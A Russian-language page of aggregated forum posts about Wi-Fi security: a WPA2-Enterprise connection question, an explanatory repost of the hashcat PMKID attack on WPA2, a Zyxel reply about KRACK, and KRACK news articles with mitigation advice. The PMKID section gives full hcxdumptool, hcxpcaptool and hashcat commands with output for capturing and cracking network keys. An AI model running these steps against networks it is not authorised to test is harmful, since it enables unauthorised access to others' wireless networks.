Wpa enterprise
Ноутбук на windows 10 pro. При попытке подключения к сети wpa2enterprise (сеть вуза) пишет "невозможно подключиться к сети". Кто-нибудь знает решение проблемы?
Ноутбук на windows 10 pro. При попытке подключения к сети wpa2enterprise (сеть вуза) пишет "невозможно подключиться к сети". Кто-нибудь знает решение проблемы?
Участниками проекта hashcat обнаружен новый вектор атаки на беспроводной стандарт WPA2, не требующий классического перехвата "рукопожатия" доступа клиент-точка. Данная уязвимость выявлена в рамках исследования потенциальных проблем безопасности нового протокола WPA3.
Основное отличие от существующих атак заключается в том, что в этой атаке захват полного 4-стороннего рукопожатия EAPOL не требуется. Новая атака выполняется в RSN IE (Robust Security Network Information Element), и для ее успешного воспроизведения достаточно одного кадра EAPOL.
В настоящее время не известно, для какого количества маршрутизаторов этот метод будет работать, — вероятнее всего, для всех существующих сетей 802.11i /p/q/r с включенными функциями роуминга, а это большинство современных маршрутизаторов.
Основные особенности новой атаки:
нет необходимости ждать клиентов — атакуется напрямую AP;
нет необходимости ждать полного 4-стороннего «рукопожатия» между клиентом и AP;
отсутствие ретрансмиссии кадров EAPOL;
исключает вероятность захвата неверных паролей от клиента;
исключены потери кадров EAPOL при отдалении/потери связи с клиентом;
высокая скорость, обусловленная отсутствием необходимости фиксировать значения nonce и replaycounter;
нет необходимости в специализированном формате выходных данных (pcap, hccapx и т. д.) — захваченные данные хранятся в виде hex-строки.
Детали атаки
RSN IE — это необязательное поле, которое можно найти в рамках управления 802.11. Одной из возможностей RSN является PMKID.
PMKID вычисляется с использованием HMAC-SHA1, где ключ является PMK, а часть данных представляет собой конкатенацию фиксированной строковой метки «PMK Name», MAC-адрес точки доступа и MAC-адрес станции.
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Поскольку PMK такой же, как в обычном четырехстороннем рукопожатии EAPOL, это идеальный вектор атаки. Мы получаем все необходимые данные в первом кадре EAPOL из AP.
Для атаки потребуются следующие инструменты (актуальные версии):
Запускаем hcxdumptool для "снятия" PMKID:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
Об успешном завершении атаки (средняя продолжительность 10 минут) уведомит надпись FOUND PMKID:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
После чего необходимо сконвертировать полученные данные:
$ ./hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1
1 PMKID(s) written to test.16800
которые после конвертации примут следующий вид:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
представляющие из себя hex-значения следующих типов данных:
PMKID*MAC AP*MAC Station*ESSID
Далее остается "скормить" полученные результаты утилите hashcat (да, без брута пока никуда) и ждать результат:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Данная техника значительно упрощает и ускоряет атаку на большинство беспроводных устройств благодаря меньшему количеству факторов влияния.
Понимаю что эта тема уже месячной давности,но вот хотелось прояснить вопрос, а надо ли менять сам роутер?
Узнав о уязвимости wpa2 ,которая krack,я задался вопросом замены маршрутизатора,который с 2013 года служит мне верой и правдой.Речь пойдет о keenetikc первого поколения, те что в белом корпусе.На данный момент обслуживание этой модели приостановлено и самая "свежая" прошивка датируется 2015 годом.Но поскольку внутри меня поселилась какая то крохотная надежда что может быть они заделают эту дыру,я задал вопрос в техподдержку Zyxel. Ниже приведу текст письма:
"Именно для моделей первого поколения (в белом корпусе) обновление не планируется выпускать, т.к. эти модели уже сняты с обслуживания.
К обновлению рекомендуются только устройства в которых используется один из режимов клиента — Wireless ISP (WISP), Wireless Client, Адаптер, Усилитель/Повторитель.
Про уязвимость KRACK у нас есть информация на сайте "Защита от уязвимости WPA2 KRACK"
Самое важное, что KRACK-атаке подвержены именно клиентские устройства, подключенные к точке доступа, а не сам роутер.
Если вы используете интернет-центр в обычном режиме с точкой доступа, то и обновлять его нет необходимости, и беспокоится не зачем.
Для защиты беспроводной сети прежде всего нужно обязательно установить последние обновления на клиентские устройства (смартфоны, планшеты, ноутбуки)."
То есть,собственно, сам роутер обновлять или менять нужно, если он используется как, например, репитер сигнала,клиент.
Команде из www.krackattacks.com удалось провести атаку MITM используя WPA2, который используется с 2006 года. Некоторый вендоры, такие как Mikrotik, уже выпустили обновления.
"Сломан" механизм 4-х кратного рукопожатия при установлении защищённого соединения посредством WPA2. Атаке более подвержены устройства с ОС Android и Linux. Уже подготовили ветку на github, но пока она ещё пустая https://github.com/vanhoefm/krackattacks.
Вся подробная информация у них на сайте www.krackattacks.com.
Уязвимость устраняется только обновлением/патчем.
Группа исследователей ( https://www.krackattacks.com/ ) обнаружила серьезную уязвимость в защищенном протоколе передачи данных WPA2, который используется в большинстве современных беспроводных сетей WiFi. Злоумышленники с помощью «атак с переустановкой пароля» (KRACK) могут не только перехватывать зашифрованные данные устройств, но и внедрять на них вирусы и черви, пишут исследователи. Смена пароля сети никак не затрудняет атаку.
Подразделение министерства национальной безопасности США по противодействию киберугрозам (US-CERT) подтвердило реальность и серьезность уязвимостей. «Обращаем внимание, что уязвимость на уровне протокола подразумевает уязвимость всех его корректных реализаций», - говорится в заявлении US-CERT.
Группа также подчеркивает, что уязвимость присуща не конкретной сети, а самому стандарту WiFi, поэтому до выхода заплаток, закрывающих эту дыру, уязвимыми оказываются все такие устройства. В частности, это сети, построенные на ОС Windows, iOS, Android, Linuх, а также ОС коммуникационного оборудования и WiFi-роутеров. Результаты исследования будут представлены на международной конференции по компьютерной безопасности CCS 1 ноября.
Порок WPA2, который могут использовать хакеры, проявляется на этапе проверки пароля WiFi. Полная надежность идеально реализованного протокола с «четырехсторонним рукопожатием», к которым относится и WPA2, доказана математически, пишут авторы. Но его текущая реализация позволяет KRACK подменить ключи шифрования сессии на третьем этапе соединения точки доступа с клиентским устройством. Затем хакеры могут полностью или частично расшифровать трафик и получить доступ к паролям, личным данным, а также контроль над устройством. Обычный пользователь никак не сможет распознать угрозу.
Оригинал https://www.vedomosti.ru/technology/articles/2017/10/16/7380...
Коммент для минусов внутри.
От себя: Пока не закрыта уязвимость. Необходимо использовать протоколы https, VPN с шифрованием, мессенжеры основные и так шифруются. Осторожно использовать обычный http и почтовые клиенты где нет шифрования.
Брешь в безопасности WPA2 позволяет перехватывать данные пользователей.
Группа исследователей в области информационной безопасности из Лёвенского католического университета в Бельгии обнаружила критическую уязвимость в протоколе шифрования W-Fi-сетей WPA2, который является самым распространённым алгоритмом защиты современных сетей Wi-Fi. Уязвимость получила название KRACK (Key Reinstallation Attacks).
Обнаруженная «лазейка» позволяет злоумышленникам прослушивать трафик со всех устройств, подключенных к Wi-Fi: ноутбуков, планшетов, смартфонов. Хакеры могут получить доступ ко всем данным, которые передаются через устройства, подключенные к Wi-Fi, если информация не зашифрована дополнительно. Речь идёт о номерах кредитных карт, логинах и паролях, переписке пользователей, пересылаемых фото и видео и так далее, рассказал руководитель группы Мэти Ванхоф (Mathy Vanhoef).
Ванхоф подчеркнул, что проблема найдена в самом протоколе WPA2, а не в отдельных устройствах, то есть уязвимость может затронуть всех пользователей Wi-Fi. Но «лазейка» работает лишь при условии, что взломщик находится в зоне действия сети жертвы.
Кто может пострадать
Взломать можно любое устройство, подключенное к Wi-Fi. Атаке подвержены все операционные системы: Android, iOS, Windows и другие. Однако в наивысшей зоне риска находятся некоторые версии Linux, а для устройств под управлением Android 6.0 и старше (ниже) уязвимость «чрезвычайно разрушительна». В Google заявили, что в курсе проблемы и что в ближайшие недели выпустят исправления для всех уязвимых устройств.
При атаке на другие платформы сложнее расшифровать все пакеты данных, но тем не менее, злоумышленники могут получить наибольшую часть сведений, предупредили эксперты.
Демонстрация атаки на Android-смартфон
Ванхофу и его коллегам не удалось выяснить, использовали ли хакеры когда-либо найденную уязвимость. Он отметил, что в июле 2017 года его группа предупредила производителей и продавцов оборудования, которое может быть затронуто. В конце августа предупреждения разослала также организация US-CERT — одно из подразделений Министерства внутренней безопасности США. Письмо получили примерно 100 компаний, пишет Ars Technica.
Уязвимость позволяет перехватить TCP-соединения, расшифровать передаваемые пакеты информации, данные HTTP и так далее, предупредили в US-CERT. «Обратите внимание, что проблема обнаружена на уровне протокола, а значит, затрагивает большинство или все имплементации стандарта WPA2», — говорится в письме.
Раскрыть детали уязвимости US-CERT и исследователи из Лёвенского университета обещали во второй половине 16 октября. Информация будет опубликована на специальном сайте, посвящённом KRACK, а также на странице в GutHub.
Что делать
Смена пароля на Wi-Fi-сети не поможет избежать атаки, говорит Ванхоф. Вместо этого он советует убедиться, что на маршрутизаторе стоит последняя версия прошивки, и обновить все пользовательские устройства. После этого можно в качестве дополнительной меры поменять пароль для сети.
Если речь идёт о корпоративной сети, то для предотвращения атаки каждый её пользователь также должен обновить своё устройство.
Чтобы получить дополнительную информацию об уязвимости и обновлениях для маршрутизаторов, Ванхоф рекомендует обратиться к своему поставщику оборудования. При этом он призывает всех продолжать пользоваться WPA2 и не возвращаться на протокол WEP.
Ars Technica рекомендует пользователям избегать подключения к Wi-Fi до выпуска патча, либо использовать HTTPS, STARTTLS, Secure Shell и другие протоколы шифрования передаваемого трафика. В качестве дополнительной меры безопасности можно использовать и VPN-сети, но к их выбору также стоит подходить осторожно, поскольку многие из них не могут гарантировать более безопасное подключение, пишет издание.
Наиболее уязвимой может оказаться критически важная корпоративная информация, заявил в разговоре с vc.ru директор направления облачных сервисов «1С-Битрикс» Александр Демидов.
Главный технический директор сервиса подписки Iron Group Алекс Хадсон призвал сохранять спокойствие. Он отметил, что при открытии сайтов с поддержкой HTTPS данные пользователя остаются в безопасности, поскольку браузер в таком случае полагается не только на алгоритмы шифрования WPA2. Кроме того, подчеркнул Хадсон, для взлома злоумышленник должен находиться неподалёку от жертвы: «Вы не стали вдруг уязвимыми для всех в интернете. Очень слабая защита, но важно учитывать этот факт при анализе уровня угрозы».
Пруф. https://vc.ru/27592-issledovateli-rasskazali-ob-uyazvimosti-...